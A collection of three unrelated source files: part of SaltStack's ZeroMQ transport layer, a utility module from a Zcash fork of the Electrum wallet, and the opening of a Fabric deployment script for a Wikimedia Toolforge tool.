Handle incoming messages from underylying TCP streams
:stream ZMQStream stream: A ZeroMQ stream.
See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html
:param dict payload: A payload to process
'''
try:
payload = self.serial.loads(payload[0])
payload = self._decode_payload(payload)
except Exception as exc:
log.error('Bad load from minion: %s: %s', type(exc).__name__, exc)
stream.send(self.serial.dumps('bad load'))
raise tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
log.error('payload and load must be a dict. Payload was: {0} and load was {1}'.format(payload, payload.get('load')))
stream.send(self.serial.dumps('payload and load must be a dict'))
raise tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
stream.send(self.serial.dumps(self._auth(payload['load'])))
raise tornado.gen.Return()
# TODO: test
try:
# Take the payload_handler function that was registered when we created the channel
# and call it, returning control to the caller until it completes
ret, req_opts = yield self.payload_handler(payload)
except Exception as e:
# always attempt to return an error to the minion
stream.send('Some exception handling minion payload')
log.error('Some exception handling a payload from minion', exc_info=True)
raise tornado.gen.Return()
req_fun = req_opts.get('fun', 'send')
if req_fun == 'send_clear':
stream.send(self.serial.dumps(ret))
elif req_fun == 'send':
stream.send(self.serial.dumps(self.crypticle.dumps(ret)))
elif req_fun == 'send_private':
stream.send(self.serial.dumps(self._encrypt_private(ret,
req_opts['key'],
req_opts['tgt'],
)))
else:
log.error('Unknown req_fun {0}'.format(req_fun))
# always attempt to return an error to the minion
stream.send('Server-side exception handling payload')
raise tornado.gen.Return()
class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel):
'''
Encapsulate synchronous operations for a publisher channel
'''
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(self.opts)
def connect(self):
return tornado.gen.sleep(5)
def _publish_daemon(self):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.appendproctitle(self.__class__.__name__)
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
# if 2.1 >= zmq < 3.0, we only have one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, self.opts.get('pub_hwm', 1000))
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
# Set the High Water Marks. For more information on HWM, see:
# http://api.zeromq.org/4-1:zmq-setsockopt
pub_sock.setsockopt(zmq.SNDHWM, self.opts.get('pub_hwm', 1000))
pub_sock.setsockopt(zmq.RCVHWM, self.opts.get('pub_hwm', 1000))
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
pub_sock.setsockopt(zmq.IPV4ONLY, 0)
pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
salt.utils.zeromq.check_ipc_path_max_len(pull_uri)
# Start the minion command publisher
log.info('Starting the Salt Publisher on {0}'.format(pub_uri))
pub_sock.bind(pub_uri)
# Securely create socket
log.info('Starting the Salt Puller on {0}'.format(pull_uri))
old_umask = os.umask(0o177)
try:
pull_sock.bind(pull_uri)
finally:
os.umask(old_umask)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
package = pull_sock.recv()
unpacked_package = salt.payload.unpackage(package)
payload = unpacked_package['payload']
if self.opts['zmq_filtering']:
# if you have a specific topic list, use that
if 'topic_lst' in unpacked_package:
for topic in unpacked_package['topic_lst']:
# zmq filters are substring match, hash the topic
# to avoid collisions
htopic = hashlib.sha1(topic).hexdigest()
pub_sock.send(htopic, flags=zmq.SNDMORE)
pub_sock.send(payload)
# otherwise its a broadcast
else:
# TODO: constants file for "broadcast"
pub_sock.send('broadcast', flags=zmq.SNDMORE)
pub_sock.send(payload)
else:
pub_sock.send(payload)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except KeyboardInterrupt:
# Cleanly close the sockets if we're shutting down
if pub_sock.closed is False:
pub_sock.setsockopt(zmq.LINGER, 1)
pub_sock.close()
if pull_sock.closed is False:
pull_sock.setsockopt(zmq.LINGER, 1)
pull_sock.close()
if context.closed is False:
context.term()
def pre_fork(self, process_manager):
'''
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
:param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager
'''
process_manager.add_process(self._publish_daemon)
def publish(self, load):
'''
Publish "load" to minions
:param dict load: A load to be sent across the wire to minions
'''
payload = {'enc': 'aes'}
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
payload['load'] = crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
# Send 0MQ to the publisher
context = zmq.Context(1)
pub_sock = context.socket(zmq.PUSH)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
pub_sock.connect(pull_uri)
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list':
int_payload['topic_lst'] = load['tgt']
# If zmq_filtering is enabled, target matching has to happen master side
match_targets = ["pcre", "glob", "list"]
if self.opts['zmq_filtering'] and load['tgt_type'] in match_targets:
# Fetch a list of minions that match
match_ids = self.ckminions.check_minions(load['tgt'],
expr_form=load['tgt_type']
)
log.debug("Publish Side Match: {0}".format(match_ids))
# Send list of miions thru so zmq can target them
int_payload['topic_lst'] = match_ids
pub_sock.send(self.serial.dumps(int_payload))
pub_sock.close()
context.term()
# TODO: unit tests!
class AsyncReqMessageClient(object):
'''
This class wraps the underylying zeromq REQ socket and gives a future-based
interface to sending and recieving messages. This works around the primary
limitation of serialized send/recv on the underlying socket by queueing the
message sends in this class. In the future if we decide to attempt to multiplex
we can manage a pool of REQ/REP sockets-- but for now we'll just do them in serial
'''
def __init__(self, opts, addr, linger=0, io_loop=None):
'''
Create an asynchronous message client
:param dict opts: The salt opts dictionary
:param str addr: The interface IP address to bind to
:param int linger: The number of seconds to linger on a ZMQ socket. See
http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER]
:param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop]
'''
self.opts = opts
self.addr = addr
self.linger = linger
if io_loop is None:
zmq.eventloop.ioloop.install()
tornado.ioloop.IOLoop.current()
else:
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
# wire up sockets
self._init_socket()
self.send_queue = []
# mapping of message -> future
self.send_future_map = {}
self.send_timeout_map = {} # message -> timeout
# TODO: timeout all in-flight sessions, or error
def destroy(self):
if hasattr(self, 'stream') and self.stream is not None:
# TODO: Optionally call stream.close() on newer pyzmq? It is broken on some.
if self.stream.socket:
self.stream.socket.close()
self.stream.io_loop.remove_handler(self.stream.socket)
# set this to None, more hacks for messed up pyzmq
self.stream.socket = None
self.stream = None
self.socket.close()
if self.context.closed is False:
self.context.term()
def __del__(self):
self.destroy()
def _init_socket(self):
if hasattr(self, 'stream'):
self.stream.close() # pylint: disable=E0203
self.socket.close() # pylint: disable=E0203
del self.stream
del self.socket
self.socket = self.context.socket(zmq.REQ)
# socket options
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, 5000
)
self._set_tcp_keepalive()
if self.addr.startswith('tcp://['):
# Hint PF type if bracket enclosed IPv6 address
if hasattr(zmq, 'IPV6'):
self.socket.setsockopt(zmq.IPV6, 1)
elif hasattr(zmq, 'IPV4ONLY'):
self.socket.setsockopt(zmq.IPV4ONLY, 0)
self.socket.linger = self.linger
self.socket.connect(self.addr)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self.socket, io_loop=self.io_loop)
def _set_tcp_keepalive(self):
'''
Ensure that TCP keepalives are set for the ReqServer.
Warning: Failure to set TCP keepalives can result in frequent or unexpected
disconnects!
'''
if hasattr(zmq, 'TCP_KEEPALIVE') and self.opts:
if 'tcp_keepalive' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
if 'tcp_keepalive_idle' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
if 'tcp_keepalive_cnt' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
if 'tcp_keepalive_intvl' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
@tornado.gen.coroutine
def _internal_send_recv(self):
while len(self.send_queue) > 0:
message = self.send_queue[0]
future = self.send_future_map.get(message, None)
if future is None:
# Timedout
del self.send_queue[0]
continue
# send
def mark_future(msg):
if not future.done():
future.set_result(self.serial.loads(msg[0]))
self.stream.on_recv(mark_future)
self.stream.send(message)
try:
ret = yield future
except: # pylint: disable=W0702
self._init_socket() # re-init the zmq socket (no other way in zmq)
del self.send_queue[0]
continue
del self.send_queue[0]
self.send_future_map.pop(message, None)
self.remove_message_timeout(message)
def remove_message_timeout(self, message):
if message not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message, None)
if timeout is not None:
# Hasn't been already timedout
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message):
'''
Handle a message timeout by removing it from the sending queue
and informing the caller
:raises: SaltReqTimeoutError
'''
future = self.send_future_map.pop(message, None)
# In a race condition the message might have been sent by the time
# we're timing it out. Make sure the future is not None
if future is not None:
del self.send_timeout_map[message]
if future.attempts < future.tries:
future.attempts += 1
log.debug('SaltReqTimeoutError, retrying. ({0}/{1})'.format(future.attempts, future.tries))
self.send(
message,
timeout=future.timeout,
tries=future.tries,
future=future,
)
else:
future.set_exception(SaltReqTimeoutError('Message timed out'))
def send(self, message, timeout=None, tries=3, future=None, callback=None):
'''
Return a future which will be completed when the message has a response
'''
if future is None:
future = tornado.concurrent.Future()
future.tries = tries
future.attempts = 0
future.timeout = timeout
# if a future wasn't passed in, we need to serialize the message
message = self.serial.dumps(message)
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message] = future
if timeout is not None:
send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message)
self.send_timeout_map[message] = send_timeout
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._internal_send_recv)
self.send_queue.append(message)
return future
class ZeroMQSocketMonitor(object):
__EVENT_MAP = None
def __init__(self, socket):
'''
Create ZMQ monitor sockets
More information:
http://api.zeromq.org/4-0:zmq-socket-monitor
'''
self._socket = socket
self._monitor_socket = self._socket.get_monitor_socket()
self._monitor_stream = None
def start_io_loop(self, io_loop):
log.trace("Event monitor start!")
self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream(self._monitor_socket, io_loop=io_loop)
self._monitor_stream.on_recv(self.monitor_callback)
def start_poll(self):
log.trace("Event monitor start!")
while self._monitor_socket is not None and self._monitor_socket.poll():
msg = self._monitor_socket.recv_multipart()
self.monitor_callback(msg)
@property
def event_map(self):
if ZeroMQSocketMonitor.__EVENT_MAP is None:
event_map = {}
for name in dir(zmq):
if name.startswith('EVENT_'):
value = getattr(zmq, name)
event_map[value] = name
ZeroMQSocketMonitor.__EVENT_MAP = event_map
return ZeroMQSocketMonitor.__EVENT_MAP
def monitor_callback(self, msg):
evt = zmq.utils.monitor.parse_monitor_message(msg)
evt['description'] = self.event_map[evt['event']]
log.debug("ZeroMQ event: {0}".format(evt))
if evt['event'] == zmq.EVENT_MONITOR_STOPPED:
self.stop()
def stop(self):
if self._socket is None:
return
self._socket.disable_monitor()
self._socket = None
self._monitor_socket = None
if self._monitor_stream is not None:
self._monitor_stream.close()
self._monitor_stream = None
log.trace("Event monitor done!")
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import requests
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
is_bundle = getattr(sys, 'frozen', False)
is_macOS = sys.platform == 'darwin'
base_units = {'ZEC':8, 'mZEC':5, 'uZEC':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum.electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-zec")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-zec")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-zec")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'Unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
def timestamp_to_datetime(timestamp):
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
# For raw json, append /insight-api-zcash
mainnet_block_explorers = {
'Explorer.Zcha.in': ('https://explorer.zcha.in/',
{'tx': 'tx', 'addr': 'address'}),
'Zcash.Blockexplorer.com': ('https://zcash.blockexplorer.com/',
{'tx': 'tx', 'addr': 'address'})
}
# TODO zec testnet block explorer
testnet_block_explorers = {
#'Blocktrail.com': ('https://www.blocktrail.com/tBTC',
#{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'})
}
def block_explorer_info():
from . import bitcoin
return testnet_block_explorers if bitcoin.NetworkConstants.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('Explorer.Zcha.in', 'Zcash.Blockexplorer.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return "/".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a Zcash address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'bitcoin':
raise BaseException("Not a bitcoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid Zcash address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='bitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except OSError as e:
print_error("OSError", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def get_cert_path():
if is_bundle and is_macOS:
# set in ./electrum
return requests.utils.DEFAULT_CA_BUNDLE_PATH
return requests.certs.where()
|
fabfile.py
|
# NB: this file requires fabric 3
from __future__ import print_function
import sys
import time
import atexit
import threading
from fabric.api import env, run, sudo, cd, local
env.hosts = ['login.tools.wmflabs.org']
env.sudo_prefix = "sudo -ni -p '%(sudo_prompt)s' "
# TODO
DEFAULT_TOOL = 'montage-dev'
DEFAULT_RELEASE_BRANCH = 'master'
SHELL_POD_NAME = 'interactive' # this'll only change if the webservce command does
TOOL_IMAGE = 'python2' # TODO: py3
# if you hit ctrl-c while ssh'd in, it kills the session, and if you
# were in the middle of pip installing packages, it will leave the
# interactive shell around. so we use atexit to clean up. (also gotta
# clean up stdin termios)
_SHELL_UP = False
old_termios_attrs = None
try:
import termios
import tty
old_termios_attrs = termios.tcgetattr(sys.stdin)
except:
pass
def _shutdown_shell():
try:
if _SHELL_UP:
# host string has to be reset for some unknown reason.
env.host_string = 'login.tools.wmflabs.org'
env.sudo_prefix = "sudo -ni -p '%(sudo_prompt)s' "
sudo('kubectl delete pod %s' % SHELL_POD_NAME)
except SystemExit:
pass
if old_termios_attrs is not None:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, old_termios_attrs)
return
atexit.register(_shutdown_shell)
def deploy(tool=DEFAULT_TOOL, branch=DEFAULT_RELEASE_BRANCH):
cur_branch = local('git symbolic-ref --short HEAD', capture=True).stdout.strip()
print()
print(' ++ deploying %s to %s' % (branch, tool))
if cur_branch != branch:
print(' -- note that you are on %s' % cur_branch)
time.sleep(3)
print()
res = local('git --no-pager log origin/{0}...{0}'.format(branch), capture=True)
if res.stdout != '':
raise SystemExit(' !! unpushed/unpulled commits on release branch %s,'
' run git push, test, and try again.' % branch)
time.sleep(3)
result = run('whoami')
prefix = run('cat /etc/wmflabs-project').stdout.strip()
username = '%s.%s' % (prefix, tool)
env.sudo_user = username
